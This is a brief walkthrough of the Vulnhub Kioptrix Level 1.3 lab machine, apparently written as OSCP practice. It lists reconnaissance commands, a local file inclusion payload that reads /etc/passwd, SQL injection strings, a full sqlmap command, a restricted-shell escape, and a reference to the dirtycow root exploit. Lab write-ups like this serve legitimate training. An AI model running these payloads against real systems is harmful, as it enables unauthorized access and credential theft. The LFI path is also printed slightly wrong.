Kioptrix:Level 1.3 (#4) Walkthrough Summary (Vulnhub| OSCP Model)
Step by Step process:
Taget Machine VM’s IP:
Step 1: I start by figuring out the IP address of the target Kioptrix 1.3 (#4) machine. IP. Using below commands.
netdiscover -r 192.168.48.0/24
compare with VMware Mac address for conformation.
Enumeration:
Step 2:Nmap Scan to find out services
nmap -Pn -A -v 192.168.48.163
Step 3: Try to find directory and interesting files form below commands.
dirb http://192.168.48.163
nikto -h http://192.168.48.163
Step 4: Try to enumerate if you found any other service in Nmap result. Here I found SMB service.
enum4linux 192.168.48.163
Gaining Access (Exploitation):
Local File Inclusion (LFI)
url+Payload : http://192.168.48.163/member.php?username=/etc/etc/passwd%00
Sql Injection:
Xpath injection at password field
payload ‘or 1=1#
Sqlmap:
sqlmap -u http://192.168.48.163/checklogin.php –data=”myusername=admin&mypassword=admin&Submit=Login” -p mypassword –level=5 –risk=3 –dbs
for more users..
Login with ssh services
Privilege Escalation:
After Enumeration and research. Tried a lot ways
Here I found one way..of course there are many way. but i feel this is easiest one..
Restricted shell implemented in python as per my research.
Bypassing lshell with os.system
Payload: echo os.system(‘/bin/bash’)
Ref: https://www.aldeid.com/wiki/Lshell
export TERM=xterm
for Pubic Exploit is : dirtycow..
https://www.exploit-db.com/exploits/40839/
Bingo, :–).. Got root Shell
Clean up:
Just Reset a victim machine for clean up.
SecureArmors 
Leave a comment